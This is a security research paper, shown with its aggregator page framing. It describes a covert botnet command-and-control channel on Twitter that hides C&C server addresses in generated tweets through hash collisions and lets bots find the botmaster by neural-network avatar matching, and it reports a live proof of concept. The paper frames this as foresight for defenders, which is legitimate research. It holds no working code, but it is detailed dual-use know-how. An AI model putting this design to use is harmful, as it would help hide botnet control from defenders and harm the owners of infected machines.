AI-powered Covert Botnet Command and Control on OSNs

09/16/2020
by   Zhi Wang, et al.
0

Botnet is one of the major threats to computer security. In previous botnet command and control (C C) scenarios using online social networks (OSNs), methods for finding botmasters (e.g. ids, links, DGAs, etc.) are hardcoded into bots. Once a bot is reverse engineered, botmaster is exposed. Meanwhile, abnormal contents from explicit commands may expose botmaster and raise anomalies on OSNs. To overcome these deficiencies, we propose an AI-powered covert C C channel. On leverage of neural networks, bots can find botmasters by avatars, which are converted into feature vectors. Commands are embedded into normal contents (e.g. tweets, comments, etc.) using text data augmentation and hash collision. Experiment on Twitter shows that the command-embedded contents can be generated efficiently, and bots can find botmaster and obtain commands accurately. By demonstrating how AI may help promote a covert communication on OSNs, this work provides a new perspective on botnet detection and confrontation.

READ FULL TEXT VIEW PDF
POST COMMENT

Comments

There are no comments yet.

Authors

page 2

page 3

page 5

page 6

page 7

page 10

page 11

page 12

01/26/2020

AI-Powered GUI Attack and Its Defensive Methods

Since the first Graphical User Interface (GUI) prototype was invented in...
06/30/2021

Zombies in the Loop? People are Insensitive to the Transparency of AI-Powered Moral Advisors

Departing from the assumption that AI needs to be transparent to be trus...
09/20/2021

Actionable Approaches to Promote Ethical AI in Libraries

The widespread use of artificial intelligence (AI) in many domains has r...
07/30/2021

Towards Understanding the Impact of Real-Time AI-Powered Educational Dashboards (RAED) on Providing Guidance to Instructors

The objectives of this ongoing research are to build Real-Time AI-Powere...
08/23/2021

Sarcasm Detection in Twitter – Performance Impact while using Data Augmentation: Word Embeddings

Sarcasm is the use of words usually used to either mock or annoy someone...
12/04/2019

Towards better social crisis data with HERMES: Hybrid sensing for EmeRgency ManagEment System

People involved in mass emergencies increasingly publish information-ric...
09/08/2018

Lost in the Digital Wild: Hiding Information in Digital Activities

This paper presents a new general framework of information hiding, in wh...
This week in AI

Get the week's most popular data science and artificial intelligence research sent straight to your inbox every Saturday.

I Introduction

Botnet is one of the most primary and serious threats in computer security today. A botnet refers to a group of compromised computers that are remotely controlled by a botmaster via command and control (C&C) channels [1]. Based on botnets, multiple types of cyber attacks can be launched, such as DDoS (Distributed Denial of Service), Spam, Cryptocurrency Mining, etc. Compared to other Internet malware, the major feature of a botnet is that it has a one-to-many C&C channel. C&C channel is the essential component of a botnet, which receives commands from botmaster and forwards them to bots.

Traditional C&C channels are built using IRC, HTTP, P2P and other protocols. With the evolution of Botnet detection, construction of C&C channels pays more attention to concealment and began to utilize some public services [29] such as social network, cloud drive, online clipboard, disposable E-mail, etc. Hammertoss (APT-29) [8] was reported to use popular web services like Twitter and GitHub to publish control commands and hide communication traces. HeroRat [23] used Telegram for C&C communication on Andriod devices. In 2020, Turla [7] was reported to utilize Gmail to receive commands and to exfiltrate information to the operators. These kinds of C&C channels do not require attackers to deploy their own servers, and defenders cannot shut down the whole botnet by destroying the C&C servers.

However, the methods of constructing C&C channel using Web platforms still have some deficiencies. To help bots find btomaster, accounts information about botmaster (e.g. ids, links, tokens, DGAs, etc.) have to hardcode into bots (see Table I). Once bots are analyzed by adversaries, botmaster is exposed and C&C activities can be monitored or interrupted. Meanwhile, in most cases, commands are published in plain, encoded or encrypted form (see Fig. 1). These abnormal contents will expose C&C activities and raise anomalies on OSNs, which may trigger restrictions on botmaster’s account and interrupt C&C activities. When the hardcoded accounts are blocked by OSNs, it is hard for bot to retrieve new commands and recover the C&C channel. To build an anomaly-resistant C&C communication on OSNs, Pantic et al. [18] proposed a method that embeds commands into tweets using metadata of tweets (length). The length of a tweet represents an ASCII code in decimal. As a tweet has a maximum length of 140, 7 bits can be conveyed through one tweet. While commands can be issued stealthily, the system has a low capacity. It needs to post N tweets to publish a command in length of N.

Year Name OSNs Identity CMD
2009 upd4t3 [17] Twitter ID Base64
2012 - [22] Twitter Token Plain
2014 Garybot [21] Twitter Token Encrypted
2015 Hammertoss [8] Twitter DGA Plain
2015 MiniDuke [5] Twitter DGA Base64
2015 - [18] Twitter DGA Tweets
2017 ROKRAT [27] Twitter ID, Token Plain
2017 PlugX [14] Pastebin URL XOR
2018 Comnie [11] GitHub URL Base64, RC4
2019 DarkHydrus [6] GoogleDrive URL Plain
TABLE I: Carriers for Building C&C Channels
Fig. 1: Commands Posted by Hammertoss and MiniDuke

These problems can be solved by introducing AI technology. Artificial intelligence (AI) was firstly proposed in 1956 with the goal of giving machines the ability to perceive, learn, think, make decisions and act as human. AI has been widely applied in various fields including cyber security. Lots of achievements on malware monitoring, intrusion detection, situation analysis, anti-fraud, etc. have reached with the integration of AI and cyber security. With the help of technologies in AI, the problems above can be solved.

Here is the main idea of this work. Botmaster posts contextual command-embedded contents on an OSN platform first (we take Twitter and tweets as the example). Then bots find botmaster through avatars with the help of a neural network model, and parse command from botmaster’s tweets. To achieve this, botmaster needs to train a neural network model and prepares some pictures as future avatars, and extracts feature vectors of the pictures through the trained model. The vectors and model are distributed with bots. When publishing a command, botmaster will choose some trending topics synchronously with bots, generate contextual, readable and command-embedded tweets using data augmentation and hash collision, and post the tweets. Bots will crawl tweets to the trending topic along with tweeters’ avatars, and then identify botmaster by comparing the avatars and the selected vector through the neural network model. If bots find their master, command can be parsed by calculating the hashes of the master’s tweets. Due to the poor explainability of neural network models, it is difficult for adversaries to find botmaster in advance even if the models and vectors are leaked, which ensures the security of botmaster’s accounts. Also, contextual tweets can eliminate the anomalies caused by abnormal contents and conceal the intent of botmaster even if the tweets are exposed to the public.

Our contributions are threefold:

  • We introduce neural networks to solve the problem of hardcoding in C&C communications. By using feature vectors of avatars and an AI model, it is easy for bots to find botmaster while hard for adversaries to locate botmaster in advance.

  • We propose a method to embed commands into natural semantic tweets to avoid anomalies caused by abnormal contents and conceal the intent of botmaster. Data augmentation and hash collision are used in this process.

  • We conduct experiments on Twitter to demonstrate the feasibility of the proposed methods and analyze its efficiency, capacity and security. We also discuss possible countermeasures to mitigate this kind of attack.

The combination of AI and cyber attacks is considered to be a upward trend. We intent to provide a possible scenario for security researchers and vendors to prevent this kind of attack and prompt preparations in advance.

This remainder of this paper is structured as follows. Section II describes some relevant backgrounds about the techniques in this work. Section III is the methodology for building the covert C&C channel. Detailed implementations of different parts are demonstrated in Section IV. Section V is the evaluations on the experiments. Section VI contains the discussion and related works to the paper. Conclusions are summarized in Section VII.

Ii Background

Ii-a Siamese Neural Network

Siamese neural network [2] is effective in measuring similarity between two inputs. The two inputs accepted by Siamese neural network will feed into two identical neural networks to generate two outputs. Like Siamese twins sharing same organs, the identical neural networks share the same architecture and weights. By calculating the distance of two outputs, similarity between two inputs can be measured. If the distance is below a threshold, it can be considered that they are similar. In recent years, Siamese neural network is widely used for human identification, object tracking, information retrieval, etc. [20]

Fig. 2

is an architecture of Siamese neural network. In this work, the two identical neural networks are CNNs. CNN (Convolutional Neural Network)

[15]

is one of the most popular neural networks and excels in speech recognition, image recognition and segmentation, natural language processing, etc. In this work, CNN is used to extract feature vectors of avatars. Images input into CNN models will be converted into vectors of the same length. Contrastive loss function

[12]

is used to help backpropagate error and train the model.

Fig. 2: Architecture of Siamese Neural Network

Ii-B Text Data Augmentation

Data augmentation is a technique used in AI to solve the problem of insufficient training data. Training neural networks requires a lot of data. By applying data augmentation, researchers can enlarge the existing dataset to meet the needs of training works and promote the robustness and normalized performances of neural network models.

In this work, botmaster needs to generate numerous tweets for hash collision. Wei J. and Zou K. [28] proposed easy data augmentation (EDA) techniques in 2019. They use Synonym Replacement (SR), Random Insertion (RI), Random Swap (RS) and Random Deletion (RD) to generate sentences with similar meaning to the given sentences. Examples of EDA are shown in Table II with an original sentence from [3].

The augmented sentences may not be grammatically and syntactically correct, and may be vary in meaning. But the Internet is diverse and inclusive, people have different options. Botmaster should ensure the tweets have semantics but does not need them to be “correct”.

Operation Sentence
None I shall certainly try to make my portraits as true to life as possible.
SR I shall certainly try to make my portrayal as true to life as possible.
RI I shall certainly try to make my portraits as true essay to life as possible.
RS I shall possible try to make my portraits as true to life as certainly.
RD I shall certainly try to my portraits as true to life as possible.
SR: synonym replacement. RI: random insertion.
RS: random swap. RD: random deletion.
TABLE II: Sentences Generated by EDA
OSN Profiles Posts Comments Pictures Trends
Login Area All Login Area All Login Post All Compress Watermark Resize Login Area All
facebook.com N N C N N Y N Y Y Y N N - - -
twitter.com N N Y N N C N Y C Y N N N R Y
instagram.com Y N Y Y N C Y Y Y Y N O Y N Y
weibo.com N N C N N C N Y Y Y Y Y N N Y
tumblr.com N N Y N N Y N Y C Y N Y N N Y
imgur.com N N Y N N Y N Y Y Y N N N N Y
pixnet.net N N C N N Y N Y Y Y N Y N N Y
pinterest.com Y N Y Y N Y Y Y Y Y N N R Y N
facebook.com does not provide trends.
Login – Login to view, Area – Area restrictions, All – All contents is available, Post – Login to post
Y – Yes, N – No, O – Occasionally, C – Customized by user, R – Restrictions that can be bypassed.
TABLE III: Contents Access Restrictions of Alexa top OSN sites

Ii-C Online Social Networks

Online Social Networks (OSNs) connect people across the world. OSNs are open, creative, and portable. Users get access to OSNs anywhere with a networked device. Everyone can create, save and share contents in different forms (e.g. text, images, videos, etc.) on OSNs, or forward and comment on any contents they are interested in. Generally, visiting OSNs is allowed by most antivirus software and network security equipment like firewall. Data transmitted from OSNs to end devices are encrypted and protected by TLS. These features of OSNs guarantee content security during data transmission and meet demands for building a good C&C channel.

Due to different considerations and privacy settings on users’ profiles, statuses, etc., contents access permissions vary on different OSNs. Some OSNs’ contents are limited only to authenticated users while some have no restrictions that everyone can access all contents in the platform. Table III is the contents access restrictions of Alexa top OSN sites. Attackers can utilize the non-restricted parts to convey customized information to others (including bots). In this work, to demonstrate the feasibility of the methods, we choose Twitter to build the C&C channel. The commands are embedded in tweets and posted by botmaster. The commands-embedded tweets have natural semantic, so no abnormal contents are posted on Twitter in this scenario, which also guarantees behavioral security for botmaster.

Fig. 3: Workflow of Botmaster and Bot

Iii Approach Overview

In this section we will introduce methodologies for building a covert botnet C&C channel on OSNs.

Iii-a Overall Workflow

As mentioned in Section I, in this work, botmaster needs to train a neural network model to extract feature vectors from some prepared images and distributes the vectors and model with bots. For publishing a command, botmaster needs to select some trending topics, generates and posts contextual tweets. Bots need to crawl tweets to a topic, identify botmaster’s account by avatars using the neural network model and get command from tweets. Fig. 3 shows the workflow of the process, which contains 3 stages.

Iii-A1 Preparation

Botmaster gets bots ready for C&C activities in this stage. To this end, botmaster needs to prepare some pictures as future Twitter avatars. Botmaster also needs to train a neural network model to extract feature vectors from these avatars (see Fig. 4). The high-dimensional features are built into bots so that bots can identify botmaster accurately when retrieving commands. Botmaster also needs to design a set of rules for selecting avatars, vectors and Twitter trends. Bots are built with the rules and distributed along with the vectors and model. Each avatar and vector are used only once to prevent the replay attack. After publishing a command, the Twitter account is considered unsafe, and it is not recommended to reuse the account. Therefore, botmaster also needs to maintain some Twitter accounts for publishing commands multiple times.

Fig. 4: Extract Features using Neural Networks

Iii-A2 Publish Commands

In this stage, botmaster publish commands on Twitter for bots to retrieve. Botmaster selects an avatar and trending topics according to the agreed rules with bots. To generate numerous tweets for hash collisions, botmaster needs to crawl some tweets to the trending topic. Then new tweets are generated using EDA and hash collisions are performed to embed commands into tweets. After successful collisions, botmaster posts the commands-embedded tweets on Twitter.

Iii-A3 Get Commands

Bots select a vector that represents botmaster and a trending topic as agreed. Then bots crawl tweets and tweeters’ avatars in the selected trend. After that, bots will calculate the distances between crawled avatars and the selected vector using the neural network model to identify botmaster. If a distance is below the threshold, it is considered that botmaster’s account is found. Bots will calculate hashes of the tweets posted by botmaster to get commands.

Iii-B Threat Model

In this work, we consider adversaries to be a third party unrelated to attackers and OSNs. Adversaries have access to the vectors from the prepared pictures and the structure, weights, implementation and other detailed information of the neural network model. Adversaries also have the abilities to reverse engineer the bot program to obtain the detailed implementation of bot.

Iii-C Technical Design

Iii-C1 Neural Network Model

A neural network model is used to protect accounts of botmaster and conceal intent of bots, as it is very difficult for adversaries to obtain the accounts in advance even if they get the model and vectors. So with a neural network model, the problem of hardcoding in current works can be solved.

Fig. 5: Usage of Neural Network Model

The model is used differently for botmaster and bots, as shown in Fig. 5. For botmaster, the model can help to extract features from avatars. Botmaster feeds the model with a batch of pictures that will become avatars, and the model outputs a batch of vectors that represent the pictures. Both the vectors and the model are built into bots. For bots, the model is used to calculate the distances between avatars from Twitter uses and the built-in vectors to identify botmaster. A selected vector and a crawled avatar are fed into the model, and the model outputs the distance of the inputs. By comparing the distance with a threshold, bots can identify whether the avatar is from botmaster or not.

As pictures uploaded to OSNs gets compressed or resized, avatar files are different from the original pictures. So the model should have a good generalization ability that it can help identify botmaster accurately and does not mistakenly identify someone else as botmaster. To prevent replay and enhance security, it is recommanded that each avatar and vector are used only once. Botmaster will change the current account and avatar when a command is issued. Bots will also delete the used vectors. During the experiments in this work, because of the limited resources (Twitter accounts), we chose to reuse one account to publish all testing tweets. It is good that there is no third party to trace us back and there are no abnormal contents produced and remained on Twitter.

Iii-C2 Meeting Point for Botmaster and Bots

While bots cannot find botmaster quickly among Twitter users without hardcoded rules, Twitter trends provides a meeting point for them. Twitter trends changes with the tweets volume under different topics, and is updated every 5 minutes, which is difficult to predict. Since ordinary users also discuss under different topics, botmaster can hide itself among them. After the selection of trending topics and embedding of commands, botmaster posts commands-embedded tweets to the trend. Bots also select a trending topic according to the agreed rule and crawl a lot of tweets along with tweeters’ avatars to the trend. Then bots start identifying botmaster by its avatar. As botmaster’s avatar is converted to a vector and distributed with bots, bots can pick botmaster up quickly by comparing distances using the neural network model.

Iii-C3 Embedding of Commands

Content security and behavioral security are of equal important in a covert communication. In previous works, when plain commands are posted on Twitter, commands are known to all Twitter users, which violates neither of the two principles above. When botmasters post encoded or encrypted commands which ensures content security, behavioral security is lost as accounts of botmasters are exposed to others. Also, abnormal contents will raise anomalies on OSNs. In this work, tweets posted by botmaster are given natural semantic and donot contain strange characters, just like any other tweets. Also, any ordinary user on Twitter can be botmaster if it sets the chosen avatar and posts on specific trends at a specific time. Commands are embedded into tweets generated by EDA through hash collision. The commands-embedded tweets are posted by botmaster. After bots found botmaster, commands can be obtained by calculating hashes of the tweets.

Iv Implementation

In this section, we demonstrate that the proposed covert C&C channel is feasible by presenting a proof-of-concept on Twitter.

Iv-a Twitter Avatars, Trends and API

In this work, bots try to find botmaster through avatars using a neural network model. Twitter provides 4 different sizes of avatars: normal (48x48), bigger (73x73), 200x200 and 400x400 (see Table IV). Links to these avatars of the same user are similar, with the only difference lying on the sizes. Default avatars returned by Twitter are in size of 48x48. According to a preliminary experiment (described in Appendix -A), of all 6 combinations of the 4 sizes, avatars in bigger sizes from the same user have a smaller distance. So bots will use avatars in size of 400x400 to identify botmaster. Bots can get links of 400x400 avatars by simply replace the suffix in the links.

In this experiments, Twitter APIs are used to get trends, tweets and avatars for botmaster and bots. Twitter Trends API returns top 50 topics in a chosen area specified by a location ID (WOEID, Where on Earth ID). The default WOEID 1 is for Trends from worldwide. There are detailed tweets volume if the volume is bigger than 10K over the past 24 hours. Botmaster can design a proper rule to select the trending topics synchronously with bots to get enough tweets for EDA and hash collision and hide in normal users. In the experiments, we get trends from Johannesburg, South Africa (whose WEOID is 1582504) by Twitter API and select the last trend above 10K discussions from the returned trends.

Size Link
400x400 https://pbs.twimg.com/profile_images/94285847 9592554497/BbazLO9L_400x400.jpg
200x200 https://pbs.twimg.com/profile_images/94285847 9592554497/BbazLO9L_200x200.jpg
73x73 https://pbs.twimg.com/profile_images/94285847 9592554497/BbazLO9L_bigger.jpg
48x48 https://pbs.twimg.com/profile_images/94285847 9592554497/BbazLO9L_normal.jpg
TABLE IV: Links for different size of avatars of the same user

Twitter Standard Search API is used to get tweets and avatar links. We use the UTF-8, URL-encoded trending topics as search queries. We set the language of returned tweets to English and the amount to 100 in the query requests. Tweets returned by API are sorted in order of post time from near to far. Tweets’ status including ID, full text, language, retweet status, create time, etc. and tweeter’s ID, name, profile image url, following status, etc. are included in the response. More details on Twitter APIs are listed on Twitter Developer Documentation [25].

Since Twitter has limited the application for developer account, attackers may not use Twitter API directly. There are third parties that provide queries for Twitter contents, including tweets, trends and user profiles. They can be utilized by attackers for building the C&C communication between botmaster and bots. Also, in a real botnet scenario, attackers may write their own implementations that uses raw HTTP requests to get the needed contents, although this would violate Twitter Terms of Service (ToS) [24]. To not violate Twitter ToS, we chose to use Twitter API in the experiments.

According to the ToS, all crawled contents for proof-of-concept tests from Twitter (avatars and tweets) are deleted within 24 hours. Contents for training and evaluation are deleted after the tasks are completed. Contents crawled by bots and botmaster are stored in computer memory and get released after use.

Iv-B Siamese Neural Network

Iv-B1 Architecture

As mentioned above, CNN is used in the Siamese network to extract features from images. Table V

is the architecture of CNN used in this work. It consists of 3 convolutional layers and 3 fully connected layers. Activation functions between convolutional layers are

, and between fully connected layers are . To increase the uncertainty of vector generation, we introduce a compression process of the avatars. The avatars are 3-channel JPG or JPEG pictures, and are resized to 128x128 before feeding into the model. The CNN model accepts a 3-channel 128-pixel image as the input and generates 128 outputs to make up a feature vector.

Inside of the SNN are 2 identical CNNs. During the training process, SNN accepts 2 images as inputs and calculates the distance of them. The 2 images will be converted into two feature vectors by CNNs first. Then Euclidean distance of the vectors is calculated to measure the similarity of the two images. A smaller distance means a higher similarity between the inputs.

We use Contrastive Loss Function promoted by Yann in 2006 [12] as the loss function of Siamese neural network. For two image-inputs of the identical CNNs, is a binary label assigned to the pair, where represents the images to be similar, and if the images are different. and are two vectors generated by the identical CNNs. Let be the Euclidean distance between the vectors, be the weights of the network, be a margin (radius around ). The loss function is:

layer size-in size-out kernel
conv1 128×128×3 122×122×6 7×7×6, 1
Tanh
pool1 122×122×6 61×61×6 2×2×1, 2
conv2 61×61×6 56×56×16 6×6×16, 1
Tanh
pool2 56×56×16 28×28×16 2×2×1, 2
conv3 28×28×16 24×24×32 5×5×32, 1
Tanh
pool3 24×24×32 12×12×32 2×2×1, 2
conv4 12×12×32 8×8×48 5×5×48, 1
Tanh
pool4 8×8×48 4×4×48 2×2×1, 2
fc1 1×768×1 1×512×1
ReLU
fc2 1×512×1 1×256×1
ReLU
output 1x256×1 1×128×1
Size 2.36MB
TABLE V: Architecture of CNN

Iv-B2 Training

To train the model, we crawled avatars in different sizes from 115, 887 Twitter users, and randomly selected avatars from 19, 137 users to build the training and testing set. We choose avatars in size of 400x400 randomly to make up input pairs with label 1. Due to the lack of original pictures of the avatars, we use avatars in size of 200x200 and 400x400 from the same user to make up input pairs with label 0. The ratio of input pairs marked as 0 and 1 is 1:2. Finally we got 19, 137 “same” image pairs and 38, 274 different image pairs. We use 75% of them for training and 25% for testing. Threshold for Euclidean distance is set to 0.02 (see Appendix -B). If the distance is lower than 0.02, two inputs are considered to be similar; and if higher, they are considered to be different.

Iv-B3 Performance

To test the performace, we conducted the training process several times. This model converges fast during training. After 10-20 epochs, 100% accuracy on test set are obtained. The size of a trained Siamese neural network model is 2.42MB. We use avatars from all 115, 887 users to make up evaluation set, total in 463, 544 pairs (115, 887 pairs with label 0 and 347, 657 pairs with label 1, 1:3 in ratio). Evaluations show that the model reaches an accuracy of more than 99.999%, with only 2-4 pairs mislabeled. Different from traditional machine learning works, we need to avoid the hijacking of botmaster’s accounts, which means mislabeling from 1 to 0 (not the same to the same) is forbidden while a dab of mislabeling from 0 to 1 can be allowed. The original labels of the mislabeled pairs are all 0, which means there are no avatar collision happened with the trained models and ensures the security for botmaster’s accounts.

Iv-C Tweets Generation and Hash Collision

Iv-C1 Commands

In this work, we take publishing an IP address (of the C&C server) as an example to illustrate the process of publishing commands. As tweets posted by botmasterhave natural semantic, information conveyed by a tweet is limited and insufficient to launch an attack. So botmaster can convey the address of a C&C server to bots. Detailed payloads for a botnet campaign and updates of model and vectors will be delivered through the server. For tasks that do not need payloads (e.g. taking screen shot, reboot computer, self destruction, etc.), commands can also be published in form of an IP, as private IPs can be utilized here. For example, if bots receive a public IP, they will connect to the IP and get detailed payloads from C&C server. If bots receive an IP that starts with 10 or 127, bots will decode the second byte of the IP and get a number that represents a command. Authentication for botmaster and bots is conducted on the C&C server.

Iv-C2 Hash Collision

Botmaster embeds command into tweets by hash collision. To convey an IP address to bots through tweets, botmaster splits the IP address into 2 parts first, as shown in Fig. 6. Each part is expressed in hexadecimal. For each generated tweet, botmaster calculates its hash and compares whether the first 16 bits of the hash are identical to one IP part. If two parts of an IP address are collided, a successful hash collision is performed. Botmaster will post the collided tweets in order. When bots identified botmaster, bots will calculate the hashes of tweets posted by botmaster and concatenate the first 2 bytes of hashes in order to get the IP address. In this way, 16 bits can be conveyed in one tweet. We do not recommend conveying a whole IP address at one time, because it needs too much tweets to launch a successful collision. Two 16 bits will reduce the calculation greatly.

Fig. 6: Hash Collision

Iv-C3 Tweets Generation

To perform a successful collision, botmaster needs numerous tweets. The new tweets are generated using EDA, as described in II-B. After the selection of a trend, botmaster crawls tweets to the trend to generate more sentences. In this experiments, 1K tweets are crawled for each selected trend by Twitter API. Before we use the crawled tweets to generate new sentences using EDA, we need to have them cleaned first. As there are words deletion and swap during augmentation, when a tweet is too short, the generated sencences may not contain the trending words, thus we filter out tweets with less than 10 words. Also, there are retweeted tweets that do not contain the trending words, we filter them out and just retain the original tweets. Then we remove emojis, links, tabs, line breaks and punctuations except “.”, “!”, “?” in each tweet. Duplicate tweets are removed at last. Normally there are 400 to 900 tweets left. We use EDA to generate 50 sentences for each tweet, which get us 20K to 45K new sentences. This is still insufficient for hash collision. We convert all sentences to upper case and add punctuations (“.”, “..”, “…”, “!”, “!!” and “!!!”) at the end of each sentences. This will result in 140K to more than 300K sentences in total, which increases the success for hash collision greatly (see V-B2).

It is not deterministic for a successful hash collision. If a collision fails, botmaster can add some noise (i.e. other punctuations, etc.) to the sentences and try it again. When more sentences are collided for one part, botmaster can pick one up randomly or by preferences. Botmaster needs to post the 2 final tweets in an order so that bots can recover the IP address correctly.

V Evaluation

V-a Experiments on Twitter

We use 7 virtual private servers in different areas (see Table VI) to simulate bots around the world. We prepared 40 photos taken with mobile phones as avatars for botmaster’s accounts. The photos were cut to size of 400x400 and converted into vectors by a trained model. Bots are installed with the model and vectors. In this experiment, bots and botmaster select a trend once an hour. Botmaster posts the tweets in 5 minutes, and bots crawls related tweets 5 minutes after the selection of the trend. Commands consists of IP addresses from the VPSs, private IPs and a threat report [10]. In this experiment, each time botmaster completes a hash collision, it is recorded to a log file. Each time the bots crawl a batch of tweets, start and finish comparisons, they also recorded to a log file. Afterwards, the logs were collected to compare the post time with the retrieval time and also to match the original commands with the decoded commands from bots. Due to the time zone difference between botmaster and bots, the recorded time was set to UTC time.

Location Time cost (s)
Region City Avg. Min. Max
South Asia Bangalore 81.51 34 267
East Asia Tokyo 14.59 5 36
Americas Toronto 16.56 6 60
Americas Virginia 12.13 5 23
Europe Amsterdam 15.19 6 27
Australia Sydney 35.26 12 292
Middle East Dubai 46.92 21 102
TABLE VI: VPS Distribution and Time Cost for Finding Botmaster

All commands in the experiments are received and parsed correctly by bots. During the tests, botmaster completes tweets collection, sentences generation and hash calculation in 13.8s on average, and reaches a success rate at 90.28% for hash collision. After the selection of a trend, bots try to crawl 1K tweets and usually get 800-900 non-repeated tweets (for only original tweets were saved for retweeted tweets). Bots need to crawl the avatars of the tweeters and compare the avatars with the selected vector to calculate the distances and determine whether botmaster is found. Due to different network and device conditions, the time this process costs varies. The time costs of bots finding botmaster are extracted from logs and shown in Table VI. It takes 5s to 4.45 min to find botmaster after the crawling of tweets among all bots. After bots obtained the IPs, botmaster has posted tweets deleted.

V-B Efficiency

V-B1 Tweets Generation

To test the efficiency of tweets generation for botmaster, we select 79 trends from 4 randomly selected English-speaking areas around the world (San Francisco, London, Sydney, and Johannesburg). 1K tweets are crawled for each trend. Also, we have the crawled tweets cleaned using the same method described in IV-C3 and generated 50 new sentences using EDA for each remained tweet. As keywords for trends, trending tpoics may contain one or more words. With random deletion and random swap adopted in EDA, keywords in topics may get deleted or position changed in the new generated sentences. If botmaster posts sentences without accurate keywords, bots cannot find botmaster’s accounts from the crawled tweets with the trends. Therefore, the quantity of sentences with keywords contained are also recorded along with the quantity of all generated sentences. The generation was conducted on an Ubuntu 18.04 x64 virtual server with 1GB ROM and 1 vCPU. In the 79 selected trends, 55 trends contain only one word and 24 contain more than one words. The results show that 89.54% of the new generated sentences contain accurate keyword for the 55 one-word trends and 77.55% contain accurate keywords for the 24 more-words trends.

Fig. 7: Efficiency of Tweets Generation
Time/s 1 2 3 5 10 15 20
Qty. 10262 14232 18202 26142 45993 65843 85694
Qty. 10K 20K 30K 50K 100K 150K 200K
Time/s 0.93 3.45 5.97 11.01 23.60 36.20 48.79
TABLE VII: Guideline for Efficiency of Tweets Generation

The efficiency and the quantity of sentences is linearly related, as is shown in Fig. 7. Table VII is samples on how many sentences can be generated in a given time and the time cost for generating sentences of a given quantity. As mentioned in IV-C3, EDA gets botmaster 20K to 45K sentences in this experiment. According to this test, it costs 3 to 10 seconds to generate the sentences. It is acceptable for botmaster preparing sentences for hash collision.

V-B2 Hash Collision

We use sentences generated above to test the efficiency of hash collision. To prepare different quantities of sentences, we also follow the method in IV-C3 that convert case and add punctuations at the end of each sentence. For each trend, we get 4 batches of new sentences incrementally by adding 2 conversions at a time. We also collected 100 C&C server addresses as commands from the threat report [10]. We call a batch of sentences “hit” an IP if the batch succeed in hash collision for the IP. We use these new batches of sentences and hashlib in Python 3.6.9 to calculate hashes (SHA-256) on the same Ubuntu machine with single thread and record the time costs and hit rate of hash collision with different quantities of sentences.

Fig. 8: Time Costs and Hit Rate of Hash Collision

As shown in Fig. 8, it takes less than 1 second to calculate the hashes. In theory, 65, 536 () sentences will hit an IP, which is ideal as hash collision is probabilistic. Experiment shows that, there should be at least 200K sentences to get a 90% hit rate, and more than 330K for a nearly 100% hit rate. As mentioned in IV-C3, there are usually 140K to more than 300K sentences for botmaster to perform a hash collision. This will result in a hit rate of over 75%. During the experiments on Twitter, botmaster gets an average of 219, 335 sentences for hash collision each time and reaches a hit rate at 90.28%, which is also acceptable for practical purposes.

V-B3 Avatar Recognition

To test the efficiency of avatar recognition by bots, we use the 40 vectors distributed with bots and 1, 000 crawled avatars in size of 400x400 to calculate the distances on the same Ubuntu machine as above. The average time costs of extracting features from 1K avatars and calculating 1K distances is 11.92s. This is also acceptable for bots in such a hardware condition. In real scenarios, this process may take longer as bots should have the avatars crawled before recognition, which varies due to different network conditions.

V-B4 Crawling Volume and Frequency

In this experiment, bots crawl 1K tweets 5 minutes after the selection of the trending topic every hour. In real scenarios, attackers can customize the waiting time, crawling volume and frequency to meet their needs. We conducted an experiment to test how many tweets are needed for bots with different waiting time. We still collect trends in Johannesburg and select the last trend above 10K disscussions as keywords. Then we use botmaster’s account to post tweets that contain the keywords. Bots start to find botmaster’s account using the keywords by Twitter API after waiting for 5, 10, 20, 30, 45, 60, 90, 120, 150 and 180 minutes. Bots will record how many tweets have crawled for finding botmaster. We collected 56 groups of data. Fig. 9 shows the relation between crawled tweets volume and waiting time. After waiting for 5 minutes, bots can find botmaster within 1K tweets in all cases. After waiting for 1 hour, in 88% cases bot can find botmaster within 1K tweets, and 98% within 3K tweets. Even 3 hours after botmaster posted the tweets, bots can still find botmaster within 1K tweets in 68% cases and within 3K tweets in 89% cases.

Fig. 9: Crawling Volume and Frequency

The results may vary because attackers can set different rules on how to select the trending topic. If attackers choose top-ranked topics from trending list, there should be more frequently tweets updates to the topics, which needs bots to crawl more tweets to find botmaster with the same waiting time. Also, if attackers choose topics from bigger cities such as New York, Los Angeles, etc., bots also need to crawl more tweets if waiting time remains the same. Still, if attackers choose to publish commands at midnight in the selected city, it is also diferent from that in the day time. Attackers need to customize the parameters with their different rules and needs.

V-C Security

In this part, we will discuss the security risks from the perspective of adversaries. Adversaries can 1) save avatars from botmaster’s accounts for future use, 2) train a GAN with the saved avatars to generate similar images, 3) reverse the neural network model to derive an image that can produce a similar vector, 4) collide a proper avatar using avatars from real Twitter users, 5) attack the model to let bot make wrong decisions on botmaster, and 6) generate adversarial samples to fool the model and bots.

V-C1 Save Avatars From Botmaster’s Accounts

Even through it is hard to guess the avatars used by botmasters, adversaries can monitor behaviors of bots to identify botmaster’s accounts. Adversaries may save avatars used by botmasters. When the next appointed time approaching, adversaries can also put on a new avatar, select a trend and post tweets that contain fake commands. But this does not work in this scenario because each avatar, vector, and account are used only once. After a command is issued, the current avatar becomes invalid, and bots will also delete the stored corresponding vector. Even if adversaries put on botmaster’s avatars, it still cannot be recognized by bots.

V-C2 Train a GAN

Adversaries can train a GAN with saved avatars to generate similar images. It is also not realistic. The avatars from botmasters are not just human faces. They can be anything, such as animals, sceneries, cars, plants, arts, etc. Also, training a GAN needs numerous data. Avatars from botmasters are serious insufficient to build a training dataset. So it is also difficult to attack the C&C in this way.

V-C3 Reverse the Model

As adversaries can get vectors and neural network model from bots, adversaries can try to recover and derive a similar image to cheat bots. CNN makes the protection possible. Neural network models can get excellent accuracy in different tasks but they have a poor explainability [9]. It is not clear how neural networks make decisions, and is also hard to reverse a neural network model. CNN learns abstract features from raw images. Each CNN hidden layer integrates the output of the previous layer to generate a higher degree of abstraction, thus different layers learn different levels of abstraction. As layers get deeper, much of information in the original image is lost. This makes it difficult to recover the original image or derive a similar one based on the vectors and the model.

V-C4 Collide an Avatar

Adversaries may try to collide for an avatar. It sounds possible but is sill hard in practical. We analyzed the composition of the vectors. The 40 vectors mentioned above contain 5120 numbers. We have the numbers sorted incrementally and put into the coordinate system, as is shown in Fig. 10. The numbers constitute a continuous interval from -0.350 to 0.264. Fig. 11

is the distribution of the numbers. Although the numbers follow a normal distribution, each value in the vector of length 128 is still taken from a continuous interval, which is a huge space and is hard to enumerate or collide. This ensures the security of botmaster’s avatars and vectors.

Fig. 10: Values of Vectors
Fig. 11: Distribution of Values in Vectors
Fig. 12: A Group of Avatars that Have Distances Below 0.02

